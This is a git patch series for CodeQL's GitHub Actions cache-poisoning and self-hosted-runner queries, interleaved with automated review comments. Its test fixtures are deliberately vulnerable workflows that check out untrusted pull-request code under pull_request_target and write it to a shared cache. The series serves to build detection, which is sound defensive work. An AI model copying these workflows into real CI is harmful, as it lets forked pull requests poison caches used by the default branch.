b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml new file mode 100644 index 00000000000..72106b9d69b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml new file mode 100644 index 00000000000..31c820904cd 
--- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml new file mode 100644 index 00000000000..d3f51456de2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml new file mode 100644 index 00000000000..ec0f9b0e6c9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 75a370246cb..f0ee6d70001 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,3 +6,5 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From 8590a0ba8fbf99e48f58d40eeb7bb33212f0a253 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:54 +0200 Subject: [PATCH 0261/1267] Refactor runOnDefaultBranch --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++++++++++++ ql/src/Security/CWE-349/CachePoisoning.ql | 14 +----- .../CWE-349/CachePoisoningByCodeInjection.ql | 15 +----- 3 files changed, 53 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 9762e9d9078..5ac2a855e9f 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -10,6 +10,56 @@ string defaultBranchTriggerEvent() { ] } +predicate test(Event e) { + e.getName() = "pull_request_target" and + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] +} + +predicate runsOnDefaultBranch(Job j) { + exists(Event e | + j.getATriggerEvent() = e and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + ) + ) + ) + or + j.getATriggerEvent().getName() = "workflow_call" and + exists(ExternalJob call | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(call) + ) +} + abstract class CacheWritingStep extends Step { } class CacheActionUsesStep extends CacheWritingStep, UsesStep { diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 7bcbe693566..11da318f474 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
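Review bot: The `branches` / `branches-ignore` checks in `runsOnDefaultBranch` compare each filter entry literally against `["main", "master", "default"]`, so a filter written as a glob (GitHub accepts patterns such as `**` or `ma*` in these keys) is not recognised as covering the default branch. A `pull_request_target` workflow with `branches: ['**']` therefore falls out of the only-`branches` case and the cache-poisoning queries stay silent for it; a repository whose default branch has another name is missed the same way. Until pattern matching is implemented, state the limitation next to the predicate, e.g. `// NOTE: branch filters are compared literally; glob patterns and non-standard default branch names are not handled`. The same literal comparison applies to the `push` case, and the fourth `pull_request_target` case (both filters present) describes a configuration GitHub rejects for a single event, so it could be dropped.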
@@ -21,19 +21,7 @@ where // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) and + runsOnDefaultBranch(j) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index e02b64e9ec5..5d739d746d5 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
@@ -21,21 +21,10 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and + // Excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch - // TODO: (require to collect trigger types) - // - add push to default branch? - // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - ( - j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) - or - j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.hasTriggerEvent(defaultBranchTriggerEvent()) - ) - ) + runsOnDefaultBranch(j) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From e0d147f39acdfb2d579a85417dea02af73e065f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:13:44 +0200 Subject: [PATCH 0262/1267] Add On and Event AST nodes Capture information about trigger events on the new On and Event classes --- ql/lib/codeql/actions/Ast.qll | 24 +++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 93 +++++++++++++++---- .../CodeExecutionOnSelfHostedRunner.ql | 2 +- 3 files changed, 96 insertions(+), 23 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5daa99d142e..1e57c8f3d29 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -254,13 +254,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { Job getJob(string jobId) { result = super.getJob(jobId) } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + On getOn() { result = super.getOn() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -305,6 +305,20 @@ class Needs extends AstNode instanceof NeedsImpl { Job getANeededJob() { result = super.getANeededJob() } } +class On extends AstNode instanceof OnImpl { + Event getAnEvent() { result = super.getAnEvent() } +} + +class Event extends AstNode instanceof EventImpl { + string getName() { result = super.getName() } + + string getAnActivityType() { result = super.getAnActivityType() } + + string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } + + predicate hasProperty(string prop) { super.hasProperty(prop) } +} + /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. @@ -328,9 +342,7 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } - predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - - string getATriggerEvent() { result = super.getATriggerEvent() } + Event getATriggerEvent() { result = super.getATriggerEvent() } Strategy getStrategy() { result = super.getStrategy() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index fca9298794f..e8a92a41142 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
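Review bot: The new public classes `On` and `Event` have no QLDoc, while `Job` directly below them documents itself and links the workflow syntax reference. Since `getATriggerEvent()` now returns an `Event` rather than a string, callers need to know what the members yield. I would add `/** A trigger event declared under a workflow's `on:` key, e.g. `pull_request_target`. */` on `Event` and `/** The `on:` block of a workflow. */` on `On`, plus a line on `getAPropertyValue` saying it returns each scalar listed under the given filter key, such as `branches`. It is also worth noting on `getATriggerEvent` that comparisons with event names must now go through `getName()`.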
@@ -68,6 +68,16 @@ private newtype TAstNode = TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TOnNode(YamlMappingLikeNode n) { exists(YamlMapping w | w.lookup("on") = n) } or + TEventNode(YamlScalar event, YamlMappingLikeNode n) { + exists(OnImpl o | + o.getNode().(YamlMapping).maps(event, n) + or + o.getNode().(YamlSequence).getAChildNode() = event and event = n + or + o.getNode().(YamlScalar) = n and event = n + ) + } or TStepNode(YamlMapping n) { exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or @@ -308,6 +318,9 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override YamlMapping getNode() { result = n } + /** Gets the `on` trigger events for this workflow. */ + OnImpl getOn() { result.getNode() = n.lookup("on") } + /** Gets the 'global' `env` mapping in this workflow. */ EnvImpl getEnv() { result.getNode() = n.lookup("env") } @@ -323,15 +336,8 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(result)) - } + EventImpl getATriggerEvent() { this.getOn().getAnEvent() = result } /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } 
@@ -573,6 +579,66 @@ class NeedsImpl extends AstNodeImpl, TNeedsNode { } } +class OnImpl extends AstNodeImpl, TOnNode { + YamlMappingLikeNode n; + + OnImpl() { this = TOnNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OnImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets an event that triggers the workflow. */ + EventImpl getAnEvent() { result.getParentNode() = this } +} + +class EventImpl extends AstNodeImpl, TEventNode { + YamlScalar e; + YamlMappingLikeNode n; + + EventImpl() { this = TEventNode(e, n) } + + override string toString() { result = e.getValue() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override OnImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EventImpl" } + + override Location getLocation() { result = e.getLocation() } + + override YamlScalar getNode() { result = e } + + /** Gets the name of the event that triggers the workflow. */ + string getName() { result = e.getValue() } + + /** Gets the Yaml Node associated with the event if any */ + YamlMappingLikeNode getValueNode() { result = n } + + /** Gets an activity type */ + string getAnActivityType() { + result = + n.(YamlMapping).lookup("types").(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Gets a string value for any property (eg: branches, branches-ignore, etc.) 
*/ + string getAPropertyValue(string prop) { + result = n.(YamlMapping).lookup(prop).(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Holds if the event has a property with the given name */ + predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } +} + class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; @@ -686,7 +752,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. // The Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] + not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -701,16 +767,11 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) > 1 } - /** Workflow is triggered by given trigger event */ - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | y = n.lookup("on").(YamlMappingLikeNode).getNode(trigger)) - } - /** Gets the trigger event that starts this workflow. */ - string getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and + this.getATriggerEvent().getName() = trigger and count(this.getATriggerEvent()) = 1 } diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index c7bdfbbc323..90997f63631 100644 
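Review bot: `EventImpl.getAChildNode()` uses the reflexive closure `n.getAChildNode*()`, and for a scalar or sequence trigger `TEventNode` is built with `event = n`, so the event's own node satisfies the equation and the event becomes a child of itself. That appears to be what produces the repeated `push | push` and `issue_comment | issue_comment` rows in `test.expected`. Excluding the node itself, `result.getNode() = n.getAChildNode*() and result != this`, would keep the child relation free of self-loops. Whether `OnImpl` needs the same guard for `on: push` depends on code outside this hunk.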
--- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -21,7 +21,7 @@ import codeql.actions.dataflow.ExternalFlow */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getEnclosingWorkflow().getATriggerEvent() = + job.getEnclosingWorkflow().getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 From 510cefecbe1e678bb6be20fc5baa7310a38a2a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:59:12 +0200 Subject: [PATCH 0263/1267] Remove debug left-overs --- .../actions/security/CachePoisoningQuery.qll | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 5ac2a855e9f..ab0f2d0809a 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,14 +10,7 @@ string defaultBranchTriggerEvent() { ] } -predicate test(Event e) { - e.getName() = "pull_request_target" and - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] -} +string defaultBranchNames() { result = ["main", "master", "default"] } predicate runsOnDefaultBranch(Job j) { exists(Event e | 
@@ -27,7 +20,7 @@ predicate runsOnDefaultBranch(Job j) { not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or e.getName() = "pull_request_target" and ( @@ -37,18 +30,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 9310150fb027ad6e85bcb266091b4093eb833eba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 09:20:45 +0200 Subject: [PATCH 0264/1267] Resolve conflict --- ql/lib/codeql/actions/ast/internal/Ast.qll | 100 ++++++++++++++---- .../actions/security/SelfHostedQuery.qll | 34 ++++++ .../CodeExecutionOnSelfHostedRunner.ql | 31 +----- .../CWE-284/.github/workflows/test1.yml | 66 ++++++++++++ .../CodeExecutionOnSelfHostedRunner.expected | 6 +- 5 files changed, 186 insertions(+), 51 deletions(-) create mode 100644 ql/lib/codeql/actions/security/SelfHostedQuery.qll diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e8a92a41142..5e4f078bc3a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll 
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -544,9 +544,15 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode { override YamlMapping getNode() { result = n } - /** Gets a specific matric expression (YamlMapping) by name. */ - ExpressionImpl getMatrixVarExpr(string name) { - n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode() + YamlMapping getMatrix() { result = n.lookup("matrix") } + + /** Gets a specific matrix expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string accessPath) { + exists(MatrixAccessPathImpl p, ScalarValueImpl v | + p.toString() = accessPath and + resolveMatrixAccessPath(n.lookup("matrix"), p).getNode(_) = v.getNode() and + result.getParentNode() = v + ) } /** Gets a specific matric expression (YamlMapping) by name. */ @@ -777,14 +783,27 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(string lbl, YamlNode r | + exists(ScalarValueImpl lbl | ( - r = runson.getNode(lbl) and - not lbl = ["group", "labels"] + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") or - r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) ) and - result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) + ) ) } } 
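Review bot: In the rewritten `getARunsOnLabel`, a label containing a matrix expression only yields a result when `getLiteralValues()` resolves, so a job whose matrix cannot be read statically (for instance one built from an expression, for which `getMatrix()` has no `YamlMapping`) produces no label at all. Such a job drops out of every check that starts from `job.getARunsOnLabel()`, so the self-hosted-runner query reports nothing for it, whereas a matrix entry holding `${{ github.repository }}` is reported (test9 in the updated fixture). Falling back to the raw text keeps the two cases consistent: add a disjunct for the matrix case with `not exists(e.getLiteralValues()) and result = lbl.getValue()`. `runson` is declared outside the hunk.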
@@ -1050,7 +1069,7 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { result = 
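Review bot: `matrixCtxRegex()` now captures `(.+)` after `matrix.`, which accepts any trailing text rather than a dotted access path. Depending on how `Utils::wrapRegexp` anchors the pattern (not visible here), a compound expression that merely starts with a matrix reference could be classified as a `MatrixExpressionImpl` with the whole remainder as its field name. If only nested keys are meant to be supported, `Utils::wrapRegexp("matrix\\.([A-Za-z0-9_.-]+)")` allows dots without admitting operators or whitespace.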
@@ -1224,24 +1243,65 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { * e.g. `${{ matrix.foo }}` */ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { - string fieldName; + string fieldAccess; MatrixExpressionImpl() { Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } - override string getFieldName() { result = fieldName } + override string getFieldName() { result = fieldAccess } override AstNodeImpl getTarget() { - exists(WorkflowImpl w | - w.getStrategy().getMatrixVarExpr(fieldName) = result and - w.getAChildNode*() = this - ) - or - exists(JobImpl j | - j.getStrategy().getMatrixVarExpr(fieldName) = result and - j.getAChildNode*() = this + result = this.getEnclosingWorkflow().getStrategy().getMatrixVarExpr(fieldAccess) or + result = this.getEnclosingJob().getStrategy().getMatrixVarExpr(fieldAccess) + } + + string getLiteralValues() { + exists(StrategyImpl s, MatrixAccessPathImpl p, ScalarValueImpl v | + (s = this.getEnclosingJob().getStrategy() or s = this.getEnclosingWorkflow().getStrategy()) and + p.toString() = fieldAccess and + resolveMatrixAccessPath(s.getMatrix(), p).getNode(_) = v.getNode() and + // Exclude values containing matrix expressions to avoid recursion + not exists(MatrixExpressionImpl e | e.getParentNode() = v) and + result = v.getValue() ) } } + +bindingset[accessPath] +string explodeAccessPath(string accessPath) { + result = accessPath or + result = accessPath.suffix(accessPath.indexOf(".") + 1) or + result = accessPath.prefix(accessPath.indexOf(".")) +} + +private newtype TAccessPath = + TMatrixAccessPathNode(string accessPath) { + exists(MatrixExpressionImpl e | accessPath = explodeAccessPath(e.getFieldName())) + } + +class MatrixAccessPathImpl extends TMatrixAccessPathNode { + string accessPath; + + MatrixAccessPathImpl() { 
this = TMatrixAccessPathNode(accessPath) } + + string toString() { result = accessPath } +} + +private YamlMappingLikeNode resolveMatrixAccessPath( + YamlMappingLikeNode root, MatrixAccessPathImpl accessPath +) { + // access path contains no dots. eg: "os" + result = root.getNode(accessPath.toString()) + or + // access path contains dots. eg: "plaform.os" + exists(MatrixAccessPathImpl first, MatrixAccessPathImpl rest, YamlMappingLikeNode newRoot | + first.toString() = accessPath.toString().splitAt(".", 0) and + rest.toString() = accessPath.toString().suffix(first.toString().length() + 1) and + newRoot = root.getNode(first.toString()) and + if newRoot instanceof YamlSequence + then result = resolveMatrixAccessPath(newRoot.(YamlSequence).getElementNode(_), rest) + else result = resolveMatrixAccessPath(newRoot, rest) + ) +} diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll new file mode 100644 index 00000000000..94c6c49a34b --- /dev/null +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll 
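Review bot: `explodeAccessPath` yields only the full path, the suffix after each dot and the prefix before each dot, so for a three-segment path such as `a.b.c` the middle segment `b` never becomes a `MatrixAccessPathImpl` unless another expression happens to contribute it. `resolveMatrixAccessPath` needs exactly that value for `first` on its second recursion step, so paths with three or more segments do not resolve and `getLiteralValues()` / `getMatrixVarExpr` return nothing for them. The new fixtures only exercise two segments (`matrix.platform.os`, `matrix.settings.host`). Adding the individual segments as a further disjunct fixes it: `or result = accessPath.splitAt(".")`. The example `"plaform.os"` in the comment inside `resolveMatrixAccessPath` should read `platform.os`.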
@@ -0,0 +1,34 @@ +import actions +import codeql.actions.dataflow.ExternalFlow + +string selfHostedRunnerRegexp() { + // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 + result = + "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +} + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getATriggerEvent() = + ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + label = job.getARunsOnLabel() and + not label.regexpMatch(selfHostedRunnerRegexp()) + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), + "public", job.getId(), _, _, runner_info) and + runner_info.indexOf("self-hosted:true") > 0 + ) +} diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index 90997f63631..621b7fb050d 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql 
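Review bot: `runner_info.indexOf("self-hosted:true") > 0` in `dynamicallyIdentifiedSelfHostedRunner` misses the case where the marker sits at the very start of `runner_info`, because `indexOf` reports that position as 0. Use `exists(runner_info.indexOf("self-hosted:true"))` or `runner_info.matches("%self-hosted:true%")` so a leading match counts. Separately, `selfHostedRunnerRegexp()` matches the labels the predicate treats as not self-hosted and is then negated, so a name such as `hostedRunnerLabelRegexp` and a one-line QLDoc saying so would prevent it from being used the wrong way round.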
